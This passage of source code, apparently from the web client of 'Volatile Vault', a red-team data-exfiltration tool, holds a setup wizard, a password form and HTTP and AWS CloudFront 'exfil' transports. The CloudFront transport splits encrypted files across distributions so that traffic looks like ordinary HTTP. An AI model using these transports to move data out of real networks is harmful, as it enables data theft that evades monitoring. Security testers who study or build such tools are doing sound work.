(!selectedStorage) return No storage selected.; 167 | if (storageConfigured) 168 | return {selectedStorage.displayName} configured.; 169 | if (!selectedStorage.isConfigurable) 170 | return {selectedStorage?.displayName} is not configurable.; 171 | 172 | return <>Configure {selectedStorage.displayName}:; 173 | }; 174 | 175 | function onExfilConfigFinished(): void { 176 | setExfilConfigured(true); 177 | setStep(Steps.ConfigureExfil + 1); 178 | } 179 | 180 | function onStorageConfigFinished(): void { 181 | setStorageConfigured(true); 182 | setStep(Steps.ConfigureStorage + 1); 183 | } 184 | 185 | function onConfigChange(config: ApiConfigResponse): void { 186 | setConfig(config); 187 | } 188 | 189 | function navToModeSelect(): void { 190 | setStep(Steps.SelectAction); 191 | setMode('None'); 192 | setSelectedExfil(null); 193 | setSelectedStorage(null); 194 | } 195 | function navToExfilSelect(): void { 196 | setStep(Steps.SelectExfil); 197 | setSelectedExfil(null); 198 | setSelectedStorage(null); 199 | } 200 | function navToExfilConfig(): void { 201 | setStep(Steps.ConfigureExfil); 202 | setSelectedStorage(null); 203 | } 204 | function navToStorageSelect(): void { 205 | setStep(Steps.SelectStorage); 206 | } 207 | function navToStorageConfig(): void { 208 | setStep(Steps.ConfigureStorage); 209 | } 210 | 211 | return ( 212 | <> 213 | 214 | Welcome to Volatile Vault. This screen gives you fine-grained control 215 | over the way your data is being uploaded, downloaded and stored. Use the 216 | following wizard to configure your up- & downloads! 217 | 218 | 219 | {/* 0 - Authentication */} 220 | 221 | 222 | 223 | {authenticated ? Authenticated! : <>Authentication} 224 | 225 | 226 | 227 | 228 | 229 | 230 | {/* 1 - Select action */} 231 | 232 | 233 | 234 | {mode == 'None' ? ( 235 | 'What would you like to do?' 236 | ) : ( 237 | You will {modeToString(mode)}. 238 | )} 239 | 240 | 241 | 242 | 243 | 244 | 245 | {/* 2 - Select exfil */} 246 | 247 | 251 | 252 | {selectedExfil == null ? ( 253 | 'Which transport should be used for exfiltration?' 254 | ) : ( 255 | 256 | You will use {selectedExfil.displayName} for exfiltration. 
257 | 258 | )} 259 | 260 | 261 | 262 | 267 | 268 | 269 | {/* 3 - Configure exfil */} 270 | 271 | 277 | {getExfilConfigLabel()} 278 | 279 | 280 | {selectedExfil?.isConfigurable && ( 281 | <> 282 | {selectedExfil.configView({ 283 | config: config as ApiConfigResponse, 284 | onChange: onConfigChange, 285 | })} 286 | 287 |
288 | 295 |
296 |
297 | 298 | )} 299 |
300 |
301 | {/* 4 - Select storage */} 302 | 303 | 304 | 305 | {selectedStorage == null ? ( 306 | isUploadMode ? ( 307 | 'Which option should be used for storage?' 308 | ) : ( 309 | 310 | Downloads will determine the storage used automatically. 311 | 312 | ) 313 | ) : ( 314 | You will use {selectedStorage.displayName} for storage. 315 | )} 316 | 317 | 318 | 319 | 324 | 325 | 326 | {/* 5 - Configure storage */} 327 | 328 | 334 | 335 | {getStorageConfigLabel()} 336 | 337 | 338 | 339 | {selectedStorage?.isConfigurable && ( 340 | <> 341 | {selectedStorage.configView({ 342 | config: config as ApiConfigResponse, 343 | onChange: onConfigChange, 344 | })} 345 | 346 |
347 | 354 |
355 |
356 | 357 | )} 358 |
359 |
360 | {/* 6 - Confirm */} 361 | {step == Steps.Confirm && ( 362 | 363 | 364 | Let's go! 365 | 366 | 367 | 368 | Does everything look right to you? Then let's continue. 369 | 370 | 371 |
372 | 379 | 382 |
383 |
384 |
385 |
386 | )} 387 |
388 | 389 | ); 390 | } 391 | -------------------------------------------------------------------------------- /client/src/components/EnterPassword.tsx: -------------------------------------------------------------------------------- 1 | import { Typography, Stack, TextField, IconButton } from '@mui/material'; 2 | import { useState, useEffect } from 'react'; 3 | import VisibilityIcon from '@mui/icons-material/Visibility'; 4 | import VisibilityOffIcon from '@mui/icons-material/VisibilityOff'; 5 | 6 | interface EnterPasswordProps { 7 | confirm?: boolean; 8 | enabled?: boolean; 9 | onPasswordEntered: (password: string) => void; 10 | children?: JSX.Element; 11 | } 12 | 13 | export default function EnterPassword({ 14 | onPasswordEntered, 15 | confirm = true, 16 | enabled = true, 17 | children, 18 | }: EnterPasswordProps) { 19 | const [password1, setPassword1] = useState(''); 20 | const [password2, setPassword2] = useState(''); 21 | const [show, setShow] = useState(false); 22 | 23 | const onPwd1Change = (event: React.ChangeEvent) => { 24 | setPassword1(event.target.value); 25 | }; 26 | const onPwd2Change = (event: React.ChangeEvent) => { 27 | setPassword2(event.target.value); 28 | }; 29 | 30 | const okay = 31 | password1.length > 0 && (confirm ? password1 === password2 : true); 32 | 33 | useEffect(() => { 34 | if (okay) onPasswordEntered(password1); 35 | }, [password1, password2]); 36 | 37 | const pwd1Error = () => { 38 | if (password1.length === 0) return 'Must not be empty'; 39 | return null; 40 | }; 41 | const pwd2Error = () => { 42 | if (password2.length === 0) return 'Must not be empty'; 43 | if (password2 !== password1) return 'Passwords do not match'; 44 | return null; 45 | }; 46 | 47 | return ( 48 | <> 49 | 50 | Password 51 | 52 | 53 | 64 | {confirm && ( 65 | 76 | )} 77 | setShow(!show)} 81 | > 82 | {show ? : } 83 | 84 | <>{children} 85 | 86 | 87 | ); 88 | } 89 | -------------------------------------------------------------------------------- /client/src/components/Main.tsx: -------------------------------------------------------------------------------- 1 | import { Lock } from '@mui/icons-material'; 2 | import { 3 | CssBaseline, 4 | Typography, 5 | Container, 6 | Card, 7 | CardContent, 8 | CardMedia, 9 | Stack, 10 | IconButton, 11 | } from '@mui/material'; 12 | import React, { useState } from 'react'; 13 | import Api, { ApiConfigResponse } from '../utils/Api'; 14 | import { SelectedMode } from './ModeSelector'; 15 | import { 16 | ExfilDownloadViewProps, 17 | ExfilExtension, 18 | StorageExtension, 19 | } from './extensions/Extension'; 20 | import BasicWizard from './BasicWizard'; 21 | import ArrowBackIcon from '@mui/icons-material/ArrowBack'; 22 | 23 | export default function Main() { 24 | const [api, _] = useState(new Api()); 25 | const [wizardDone, setWizardDone] = useState(false); 26 | const [config, setConfig] = useState(null); 27 | const [mode, setMode] = useState('None'); 28 | const [exfil, setExfil] = useState(null); 29 | const [storage, setStorage] = useState(null); 30 | 31 | function onWizardFinished( 32 | config: ApiConfigResponse, 33 | mode: SelectedMode, 34 | exfil: ExfilExtension, 35 | storage?: StorageExtension 36 | ) { 37 | setConfig(config); 38 | setMode(mode); 39 | setExfil(exfil); 40 | setStorage(storage ? 
storage : null); 41 | setWizardDone(true); 42 | } 43 | 44 | function getExfilView() { 45 | if (exfil === null) return <>Exfil unset!; 46 | 47 | switch (mode) { 48 | case 'UploadSingle': { 49 | const View: (props: ExfilDownloadViewProps) => JSX.Element = 50 | exfil.uploadSingleView; 51 | return ; 52 | } 53 | case 'DownloadSingle': { 54 | const View: () => JSX.Element = exfil.downloadSingleView; 55 | return ; 56 | } 57 | case 'UploadChunked': { 58 | const View: (props: ExfilDownloadViewProps) => JSX.Element = 59 | exfil.uploadChunkedView; 60 | return ; 61 | } 62 | case 'DownloadChunked': { 63 | const View: () => JSX.Element = exfil.downloadChunkedView; 64 | return ; 65 | } 66 | } 67 | } 68 | 69 | function getModeString() { 70 | switch (mode) { 71 | case 'UploadSingle': 72 | return 'Basic upload'; 73 | case 'DownloadSingle': 74 | return 'Basic download'; 75 | case 'DownloadChunked': 76 | return 'Chunked download'; 77 | case 'UploadChunked': 78 | return 'Chunked upload'; 79 | default: 80 | throw new Error(`Invalid mode ${mode} at this stage!`); 81 | } 82 | } 83 | 84 | return ( 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | Volatile Vault 95 | 96 | 97 | 98 | 99 | {wizardDone === false && ( 100 | 101 | )} 102 | {wizardDone && ( 103 | <> 104 | 105 | setWizardDone(false)}> 106 | 107 | 108 | 109 | {exfil?.displayName} - {getModeString()} 110 | 111 | 112 | {getExfilView()} 113 | 114 | )} 115 | 116 | 117 | 118 | 119 | ); 120 | } 121 | -------------------------------------------------------------------------------- /client/src/components/ModeSelector.tsx: -------------------------------------------------------------------------------- 1 | import { Button, Stack } from '@mui/material'; 2 | import { ExfilExtension } from './extensions/Extension'; 3 | 4 | export type SelectedMode = 5 | | 'None' 6 | | 'UploadSingle' 7 | | 'DownloadSingle' 8 | | 'UploadChunked' 9 | | 'DownloadChunked'; 10 | 11 | interface SelectorProps { 12 | exfils: ExfilExtension[]; 13 | onSelected: (type: SelectedMode, exfils: ExfilExtension[]) => void; 14 | } 15 | 16 | export default function ModeSelector({ exfils, onSelected }: SelectorProps) { 17 | var hasUploadSingle = exfils.find((e) => e.canUploadSingle); 18 | var hasDownloadSingle = exfils.find((e) => e.canDownloadSingle); 19 | var hasUploadChunked = exfils.find((e) => e.canUploadChunked); 20 | var hasDownloadChunked = exfils.find((e) => e.canDownloadChunked); 21 | 22 | const onModeSelected = (type: SelectedMode) => { 23 | if (type == 'None') throw new Error('Invalid selector type None'); 24 | const matchedExfils = exfils.filter((e) => 25 | e.capabilities.find((c) => c == type) 26 | ); 27 | 28 | onSelected(type, matchedExfils); 29 | }; 30 | 31 | return ( 32 | 33 | {(hasUploadSingle || hasDownloadSingle) && ( 34 | 35 | {hasUploadSingle && ( 36 | 42 | )} 43 | {hasDownloadSingle && ( 44 | 50 | )} 51 | 52 | )} 53 | {(hasUploadChunked || hasDownloadChunked) && ( 54 | 55 | {hasUploadChunked && ( 56 | 62 | )} 63 | {hasDownloadChunked && ( 64 | 70 | )} 71 | 72 | )} 73 | 74 | ); 75 | } 76 | -------------------------------------------------------------------------------- /client/src/components/extensions/ExtensionManager.ts: -------------------------------------------------------------------------------- 1 | import Api, { ApiConfigResponse } from '../../utils/Api'; 2 | import Config from '../../utils/Config'; 3 | import { ExfilExtension, StorageExtension } from './Extension'; 4 | import { DummyExfil } from './exfil/DummyExfil'; 5 | import { BasicHttpExfil } from 
'./exfil/BasicHttpExfil'; 6 | import { DummyStorage } from './storage/DummyStorage'; 7 | import { FileSystem } from './storage/FileSystem'; 8 | import { AwsCloudFrontExfil } from './exfil/AwsCloudFrontExfil'; 9 | import { AwsS3 } from './storage/AwsS3'; 10 | 11 | export function initializeExfilExtensions( 12 | api: Api, 13 | config: ApiConfigResponse 14 | ): ExfilExtension[] { 15 | if (Config.DEBUG) 16 | return [ 17 | new BasicHttpExfil(api, config), 18 | new AwsCloudFrontExfil(api, config), 19 | new DummyExfil(api, config), 20 | ]; 21 | else 22 | return [ 23 | new BasicHttpExfil(api, config), 24 | new AwsCloudFrontExfil(api, config), 25 | ]; 26 | } 27 | 28 | export function getStorages(): StorageExtension[] { 29 | if (Config.DEBUG) return [new FileSystem(), new AwsS3(), new DummyStorage()]; 30 | else return [new FileSystem(), new AwsS3()]; 31 | } 32 | -------------------------------------------------------------------------------- /client/src/components/extensions/exfil/AwsCloudFrontExfil.tsx: -------------------------------------------------------------------------------- 1 | import axios from 'axios'; 2 | import Api, { 3 | ApiDownloadResponse, 4 | ApiUploadResponse, 5 | ApiResponse, 6 | ApiConfigAwsCloudFrontExfil, 7 | } from '../../../utils/Api'; 8 | import { 9 | BaseExfilExtension, 10 | ConfigFn, 11 | ExfilDownloadFn, 12 | ExfilDownloadViewProps, 13 | ExfilProviderCapabilities, 14 | ExfilUploadFn, 15 | ReportEvent, 16 | } from '../Extension'; 17 | import GenericHttpDownload from '../../ui/GenericHttpDownload'; 18 | import GenericHttpUpload from '../../ui/GenericHttpUpload'; 19 | import { formatSize } from '../../../utils/Files'; 20 | 21 | export class AwsCloudFrontExfil extends BaseExfilExtension { 22 | get downloadSingleView(): ExfilDownloadFn { 23 | throw new Error('Method not implemented.'); 24 | } 25 | get uploadSingleView(): ExfilUploadFn { 26 | throw new Error('Method not implemented.'); 27 | } 28 | get configView(): ConfigFn { 29 | throw new Error('Method not implemented.'); 30 | } 31 | get downloadChunkedView(): ExfilDownloadFn { 32 | return () => ; 33 | } 34 | get uploadChunkedView(): ExfilUploadFn { 35 | return ({ storage }: ExfilDownloadViewProps) => ( 36 | 37 | ); 38 | } 39 | 40 | get name(): string { 41 | return 'awscloudfront'; 42 | } 43 | get displayName(): string { 44 | return 'AWS CloudFront'; 45 | } 46 | get description(): string { 47 | return 'Uses either pre-deployed or dynamically deployed CloudFront distributions to proxy uploads and downloads through. Files are zipped & encrypted before upload and decrypted & unzipped after download. Uploads and downloads use a REST interface and data is transferred in multiple blobs to different hosts. 
Transfer looks like regular HTTP uploads/downloads.'; 48 | } 49 | get capabilities(): ExfilProviderCapabilities[] { 50 | return ['UploadChunked', 'DownloadChunked']; 51 | } 52 | override isPresent(): boolean { 53 | return ( 54 | this.config.exfils.awscloudfront !== undefined && 55 | this.config.exfils.awscloudfront !== null 56 | ); 57 | } 58 | getConfig(): ApiConfigAwsCloudFrontExfil { 59 | if (!this.config.exfils.awscloudfront) 60 | throw new Error('Attempted to access missing awscloudfront config!'); 61 | return this.config.exfils.awscloudfront.info as ApiConfigAwsCloudFrontExfil; 62 | } 63 | 64 | downloadSingle( 65 | id: string, 66 | reportEvent?: ReportEvent | undefined 67 | ): Promise { 68 | throw new Error('Method not supported.'); 69 | } 70 | 71 | async uploadSingle( 72 | storage: string, 73 | data: ArrayBuffer, 74 | reportEvent?: ReportEvent | undefined 75 | ): Promise { 76 | throw new Error('Method not supported.'); 77 | } 78 | 79 | async downloadChunked( 80 | id: string, 81 | reportEvent?: ReportEvent | undefined 82 | ): Promise { 83 | try { 84 | // Initiate download 85 | const initChunkedData = await this.initChunkedDownload(id); 86 | 87 | reportEvent && 88 | reportEvent( 89 | 'Control', 90 | `TransferID: ${initChunkedData.id}, Chunks: ${ 91 | initChunkedData.chunks 92 | }, Size: ${formatSize(initChunkedData.size)}` 93 | ); 94 | 95 | if (this.getConfig().download.mode == 'Dynamic') 96 | reportEvent && 97 | reportEvent( 98 | 'Control', 99 | 'Chunked download uses dynamically deployed distributions; this might take several minutes' 100 | ); 101 | 102 | // Wait for domains to become ready 103 | const delay = (ms: number) => 104 | new Promise((resolve) => setTimeout(resolve, ms)); 105 | var domainsReady = false; 106 | do { 107 | const info = await this.getTransferStatus( 108 | initChunkedData.hosts[0], 109 | initChunkedData.id 110 | ); 111 | domainsReady = info.status; 112 | if (!domainsReady) { 113 | await delay(10); 114 | reportEvent && 115 | reportEvent('Info', 'Waiting for distributions to deploy...'); 116 | } 117 | } while (!domainsReady); 118 | 119 | // Download all chunks 120 | reportEvent && 121 | reportEvent( 122 | 'Download', 123 | `Downloading ${initChunkedData.chunks} chunks...` 124 | ); 125 | const chunks = await Promise.all( 126 | Array.from({ length: initChunkedData.chunks }, (_, key) => 127 | this.downloadChunk( 128 | initChunkedData.hosts[key % initChunkedData.hosts.length], 129 | initChunkedData.id, 130 | key 131 | ).then((res) => { 132 | reportEvent && 133 | reportEvent( 134 | 'Download', 135 | `Downloaded ${formatSize( 136 | res.data.byteLength 137 | )} from chunk #${key}.` 138 | ); 139 | return res; 140 | }) 141 | ) 142 | ); 143 | 144 | const totalLength = chunks.reduce( 145 | (acc, chunk) => acc + chunk.data.byteLength, 146 | 0 147 | ); 148 | const allChunks = new ArrayBuffer(totalLength); 149 | const allChunksView = new Uint8Array(allChunks); 150 | let offset = 0; 151 | 152 | chunks.forEach((chunk) => { 153 | allChunksView.set(new Uint8Array(chunk.data), offset); 154 | offset += chunk.data.byteLength; 155 | }); 156 | 157 | // Terminate download 158 | await this.terminateDownload( 159 | initChunkedData.hosts[0], 160 | initChunkedData.id 161 | ); 162 | 163 | reportEvent && reportEvent('Info', 'Download finished!', 'success'); 164 | 165 | return Api.success_from_data({ data: allChunks }) as ApiDownloadResponse; 166 | } catch (error) { 167 | return Promise.reject( 168 | Api.fail_from_error( 169 | error, 170 | (error as any)?.response?.status == 404 ? 
'ID not found' : 'Failure' 171 | ) as ApiDownloadResponse 172 | ); 173 | } 174 | } 175 | 176 | async uploadChunked( 177 | storage: string, 178 | data: ArrayBuffer, 179 | reportEvent?: ReportEvent | undefined 180 | ): Promise { 181 | // Initiate download 182 | const initChunkedData = await this.initChunkedUpload(storage, data); 183 | 184 | reportEvent && 185 | reportEvent( 186 | 'Control', 187 | `TransferID: ${initChunkedData.id}, Chunks: ${ 188 | initChunkedData.chunks 189 | }, Size: ${formatSize(initChunkedData.size)}` 190 | ); 191 | 192 | const chunksize = this.getConfig().chunk_size as number; 193 | const chunks = Array.from({ length: initChunkedData.chunks }, (_, key) => 194 | data.slice(key * chunksize, key * chunksize + chunksize) 195 | ); 196 | 197 | if (this.getConfig().upload.mode == 'Dynamic') 198 | reportEvent && 199 | reportEvent( 200 | 'Control', 201 | 'Chunked upload uses dynamically deployed distributions; this might take several minutes' 202 | ); 203 | 204 | // Wait for domains to become ready 205 | const delay = (ms: number) => 206 | new Promise((resolve) => setTimeout(resolve, ms)); 207 | var domainsReady = false; 208 | do { 209 | const info = await this.getTransferStatus( 210 | initChunkedData.hosts[0], 211 | initChunkedData.id 212 | ); 213 | domainsReady = info.status; 214 | if (!domainsReady) { 215 | await delay(10); 216 | reportEvent && 217 | reportEvent('Info', 'Waiting for distributions to deploy...'); 218 | } 219 | } while (!domainsReady); 220 | 221 | // Upload all chunks 222 | reportEvent && 223 | reportEvent('Upload', `Uploading ${initChunkedData.chunks} chunks...`); 224 | 225 | const res = await Promise.all( 226 | chunks.map((chunk, i) => 227 | this.uploadChunk( 228 | initChunkedData.hosts[i % initChunkedData.hosts.length], 229 | initChunkedData.id, 230 | i, 231 | chunk 232 | ).then((res) => { 233 | reportEvent && 234 | reportEvent( 235 | 'Upload', 236 | `Uploaded ${formatSize(chunks[i].byteLength)} for chunk #${i}.` 237 | ); 238 | return res; 239 | }) 240 | ) 241 | ); 242 | 243 | const id = res.find((r) => r.id !== undefined); 244 | if (!id) throw new Error('Did not receive a file ID'); 245 | 246 | reportEvent && reportEvent('Info', 'Upload finished!', 'success'); 247 | 248 | return id; 249 | } 250 | addHost(reportEvent: ReportEvent): Promise { 251 | throw new Error('Method not supported.'); 252 | } 253 | removeHost(host: string, reportEvent: ReportEvent): Promise { 254 | throw new Error('Method not supported.'); 255 | } 256 | 257 | static PROTO = window.location.protocol; 258 | async initChunkedDownload(id: string): Promise { 259 | const cfg = this.getConfig(); 260 | const host = 261 | cfg.download.hosts && cfg.download.hosts.length 262 | ? cfg.download.hosts[ 263 | Math.floor(Math.random() * cfg.download.hosts.length) 264 | ] 265 | : Api.BASE_URL; 266 | 267 | try { 268 | const res = await axios.post( 269 | `/api/${this.name}/initdownload/${id}`, 270 | {}, 271 | { 272 | headers: { 273 | Authorization: `Bearer ${this.api.token}`, 274 | }, 275 | responseType: 'json', 276 | withCredentials: true, 277 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 278 | } 279 | ); 280 | 281 | if (!res.data) 282 | return Promise.reject( 283 | Api.fail_from_error(undefined, 'Failed to init download') 284 | ); 285 | 286 | return Api.success_from_data(res.data) as InitChunkedResponse; 287 | } catch (error) { 288 | return Promise.reject( 289 | Api.fail_from_error( 290 | error, 291 | (error as any)?.response?.status == 404 ? 
'ID not found' : 'Failure' 292 | ) as ApiDownloadResponse 293 | ); 294 | } 295 | } 296 | 297 | async downloadChunk( 298 | host: string, 299 | transferId: string, 300 | chunkNo: number 301 | ): Promise { 302 | try { 303 | const res = await axios.get( 304 | `/api/${this.name}/download/${transferId}/chunk/${chunkNo}`, 305 | { 306 | headers: { 307 | Authorization: `Bearer ${this.api.token}`, 308 | }, 309 | responseType: 'arraybuffer', 310 | withCredentials: true, 311 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 312 | } 313 | ); 314 | 315 | if (!res.data) 316 | return Promise.reject( 317 | Api.fail_from_error(undefined, 'Failed to download data') 318 | ); 319 | 320 | return Api.success_from_data({ 321 | data: res.data, 322 | }) as ApiDownloadResponse; 323 | } catch (error) { 324 | return Promise.reject( 325 | Api.fail_from_error( 326 | error, 327 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 328 | ) as ApiDownloadResponse 329 | ); 330 | } 331 | } 332 | 333 | async getTransferStatus( 334 | host: string, 335 | transferId: string 336 | ): Promise { 337 | try { 338 | const res = await axios.get(`/api/${this.name}/status/${transferId}`, { 339 | headers: { 340 | Authorization: `Bearer ${this.api.token}`, 341 | }, 342 | responseType: 'json', 343 | withCredentials: true, 344 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 345 | }); 346 | 347 | if (!res.data) 348 | return Promise.reject( 349 | Api.fail_from_error(undefined, 'Failed to download data') 350 | ); 351 | 352 | return Api.success_from_data(res.data) as TransferStatusResponse; 353 | } catch (error) { 354 | return Promise.reject( 355 | Api.fail_from_error( 356 | error, 357 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 358 | ) as TransferStatusResponse 359 | ); 360 | } 361 | } 362 | 363 | async terminateDownload( 364 | host: string, 365 | transferId: string 366 | ): Promise { 367 | try { 368 | const res = await axios.post( 369 | `/api/${this.name}/download/terminate/${transferId}`, 370 | {}, 371 | { 372 | headers: { 373 | Authorization: `Bearer ${this.api.token}`, 374 | }, 375 | responseType: 'json', 376 | withCredentials: true, 377 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 378 | } 379 | ); 380 | 381 | if (res.status != 200) 382 | return Promise.reject( 383 | Api.fail_from_error(undefined, 'Failed to terminate download') 384 | ); 385 | 386 | return Api.success_from_data({}) as ApiResponse; 387 | } catch (error) { 388 | return Promise.reject( 389 | Api.fail_from_error( 390 | error, 391 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 392 | ) as ApiResponse 393 | ); 394 | } 395 | } 396 | 397 | async initChunkedUpload( 398 | storage: string, 399 | data: ArrayBuffer 400 | ): Promise { 401 | const cfg = this.getConfig(); 402 | const host = 403 | cfg.download.hosts && cfg.download.hosts.length 404 | ? 
cfg.download.hosts[ 405 | Math.floor(Math.random() * cfg.download.hosts.length) 406 | ] 407 | : Api.BASE_URL; 408 | 409 | try { 410 | const res = await axios.post( 411 | `/api/${this.name}/initupload/${storage}/${data.byteLength}`, 412 | {}, 413 | { 414 | headers: { 415 | Authorization: `Bearer ${this.api.token}`, 416 | }, 417 | responseType: 'json', 418 | withCredentials: true, 419 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 420 | } 421 | ); 422 | 423 | if (!res.data) 424 | return Promise.reject( 425 | Api.fail_from_error(undefined, 'Failed to init upload') 426 | ); 427 | 428 | return Api.success_from_data(res.data) as InitChunkedResponse; 429 | } catch (error) { 430 | return Promise.reject( 431 | Api.fail_from_error( 432 | error, 433 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 434 | ) as ApiDownloadResponse 435 | ); 436 | } 437 | } 438 | 439 | async uploadChunk( 440 | host: string, 441 | transferId: string, 442 | chunkNo: number, 443 | data: ArrayBuffer 444 | ): Promise { 445 | const cfg = this.getConfig(); 446 | 447 | try { 448 | const res = await axios.post( 449 | `/api/${this.name}/upload/${transferId}/chunk/${chunkNo}`, 450 | data, 451 | { 452 | headers: { 453 | 'Content-Type': 'application/octet-stream', 454 | Authorization: `Bearer ${this.api.token}`, 455 | }, 456 | maxBodyLength: Infinity, 457 | maxContentLength: Infinity, 458 | responseType: 'json', 459 | baseURL: `${AwsCloudFrontExfil.PROTO}//${host}`, 460 | } 461 | ); 462 | 463 | if (res.status != 200) 464 | return Promise.reject( 465 | Api.fail_from_error(undefined, `Failed to upload chunk ${chunkNo}`) 466 | ); 467 | 468 | return Api.success_from_data(res.data) as ApiUploadResponse; 469 | } catch (error) { 470 | return Promise.reject(Api.fail_from_error(error)); 471 | } 472 | } 473 | } 474 | 475 | interface InitChunkedResponse extends ApiResponse { 476 | hosts: string[]; 477 | chunks: number; 478 | size: number; 479 | id: string; 480 | } 481 | 482 | interface TransferStatusResponse extends ApiResponse { 483 | status: boolean; 484 | } 485 | -------------------------------------------------------------------------------- /client/src/components/extensions/exfil/BasicHttpExfil.tsx: -------------------------------------------------------------------------------- 1 | import axios from 'axios'; 2 | import Api, { 3 | ApiConfigBasicHTTPExfil, 4 | ApiDownloadResponse, 5 | ApiUploadResponse, 6 | ApiResponse, 7 | } from '../../../utils/Api'; 8 | import { 9 | BaseExfilExtension, 10 | ConfigFn, 11 | ExfilDownloadFn, 12 | ExfilDownloadViewProps, 13 | ExfilProviderCapabilities, 14 | ExfilUploadFn, 15 | ReportEvent, 16 | } from '../Extension'; 17 | import GenericHttpDownload from '../../ui/GenericHttpDownload'; 18 | import GenericHttpUpload from '../../ui/GenericHttpUpload'; 19 | 20 | export class BasicHttpExfil extends BaseExfilExtension { 21 | get downloadSingleView(): ExfilDownloadFn { 22 | return () => 23 | } 24 | get uploadSingleView(): ExfilUploadFn { 25 | return ({ storage }: ExfilDownloadViewProps) => ( 26 | 27 | ); 28 | } 29 | get configView(): ConfigFn { 30 | throw new Error('Method not supported.'); 31 | } 32 | get downloadChunkedView(): ExfilDownloadFn { 33 | throw new Error('Method not supported.'); 34 | } 35 | get uploadChunkedView(): ExfilUploadFn { 36 | throw new Error('Method not supported.'); 37 | } 38 | 39 | get name(): string { 40 | return 'basichttp'; 41 | } 42 | get displayName(): string { 43 | return 'Built-In HTTP'; 44 | } 45 | get description(): string { 46 | return 'Uses regular 
HTTP(S) for file uploads and downloads. Files are zipped & encrypted before upload and decrypted & unzipped after download. Uploads and downloads use a REST interface and data is transferred in large, continuous blobs. Transfer looks like regular HTTP uploads/downloads.'; 47 | } 48 | get capabilities(): ExfilProviderCapabilities[] { 49 | return ['UploadSingle', 'DownloadSingle']; 50 | } 51 | override isPresent(): boolean { 52 | return ( 53 | this.config.exfils.basichttp !== undefined && 54 | this.config.exfils.basichttp !== null 55 | ); 56 | } 57 | getConfig(): ApiConfigBasicHTTPExfil { 58 | if (!this.config.exfils.basichttp) 59 | throw new Error('Attempted to access missing basichttp config!'); 60 | return this.config.exfils.basichttp.info as ApiConfigBasicHTTPExfil; 61 | } 62 | 63 | async downloadSingle( 64 | id: string, 65 | reportEvent?: ReportEvent | undefined 66 | ): Promise { 67 | const cfg = this.getConfig(); 68 | const host = 69 | cfg.hosts && cfg.hosts.length 70 | ? cfg.hosts[Math.floor(Math.random() * cfg.hosts.length)] 71 | : Api.BASE_URL; 72 | 73 | try { 74 | const res = await axios.get(`${host}/api/${this.name}/download/${id}`, { 75 | headers: { 76 | Authorization: `Bearer ${this.api.token}`, 77 | }, 78 | responseType: 'arraybuffer', 79 | }); 80 | 81 | if (!res.data) 82 | return Promise.reject( 83 | Api.fail_from_error(undefined, 'Failed to download data') 84 | ); 85 | 86 | return Api.success_from_data({ 87 | data: res.data, 88 | }) as ApiDownloadResponse; 89 | } catch (error) { 90 | return Promise.reject( 91 | Api.fail_from_error( 92 | error, 93 | (error as any)?.response?.status == 404 ? 'ID not found' : 'Failure' 94 | ) as ApiDownloadResponse 95 | ); 96 | } 97 | } 98 | 99 | async uploadSingle( 100 | storage: string, 101 | data: ArrayBuffer, 102 | reportEvent?: ReportEvent | undefined 103 | ): Promise { 104 | const cfg = this.getConfig(); 105 | const host = 106 | cfg.hosts && cfg.hosts.length 107 | ? 
cfg.hosts[Math.floor(Math.random() * cfg.hosts.length)] 108 | : Api.BASE_URL; 109 | 110 | try { 111 | const res = await axios.post( 112 | `${host}/api/${this.name}/upload/${storage}`, 113 | data, 114 | { 115 | headers: { 116 | 'Content-Type': 'application/octet-stream', 117 | Authorization: `Bearer ${this.api.token}`, 118 | }, 119 | maxBodyLength: Infinity, 120 | maxContentLength: Infinity, 121 | responseType: 'json', 122 | } 123 | ); 124 | 125 | if (!res.data?.id) 126 | return Promise.reject( 127 | Api.fail_from_error(undefined, 'Failed to upload file ID') 128 | ); 129 | 130 | return Api.success_from_data(res.data) as ApiUploadResponse; 131 | } catch (error) { 132 | return Promise.reject(Api.fail_from_error(error)); 133 | } 134 | } 135 | downloadChunked( 136 | id: string, 137 | reportEvent?: ReportEvent | undefined 138 | ): Promise { 139 | throw new Error('Method not supported.'); 140 | } 141 | uploadChunked( 142 | storage: string, 143 | data: ArrayBuffer, 144 | reportEvent?: ReportEvent | undefined 145 | ): Promise { 146 | throw new Error('Method not supported.'); 147 | } 148 | addHost(reportEvent: ReportEvent): Promise { 149 | throw new Error('Method not supported.'); 150 | } 151 | removeHost(host: string, reportEvent: ReportEvent): Promise { 152 | throw new Error('Method not supported.'); 153 | } 154 | } 155 | -------------------------------------------------------------------------------- /client/src/components/extensions/exfil/DummyExfil.tsx: -------------------------------------------------------------------------------- 1 | import { 2 | ApiConfigBaseExfil, 3 | ApiConfigResponse, 4 | ApiDownloadResponse, 5 | ApiUploadResponse, 6 | ApiResponse, 7 | } from '../../../utils/Api'; 8 | import { 9 | BaseExfilExtension, 10 | ConfigFn, 11 | ConfigViewProps, 12 | ExfilDownloadFn, 13 | ExfilDownloadViewProps, 14 | ExfilProviderCapabilities, 15 | ExfilUploadFn, 16 | ReportEvent, 17 | StorageExtension, 18 | } from '../Extension'; 19 | 20 | export class DummyExfil extends BaseExfilExtension { 21 | get downloadSingleView(): ExfilDownloadFn { 22 | return () => <>Dummy single download; 23 | } 24 | get uploadSingleView(): ExfilUploadFn { 25 | return ({ storage }: ExfilDownloadViewProps) => <>Dummy single upload; 26 | } 27 | get downloadChunkedView(): ExfilDownloadFn { 28 | return () => <>Dummy chunked download; 29 | } 30 | get uploadChunkedView(): ExfilUploadFn { 31 | return ({ storage }: ExfilDownloadViewProps) => <>Dummy chunked upload; 32 | } 33 | get configView(): ConfigFn { 34 | return (props: ConfigViewProps) => <>Dummy config view; 35 | } 36 | get capabilities(): ExfilProviderCapabilities[] { 37 | return [ 38 | 'UploadSingle', 39 | 'UploadChunked', 40 | 'DownloadChunked', 41 | 'DownloadSingle', 42 | 'RemoveHost', 43 | 'AddHost', 44 | ]; 45 | } 46 | isPresent(): boolean { 47 | return true; 48 | 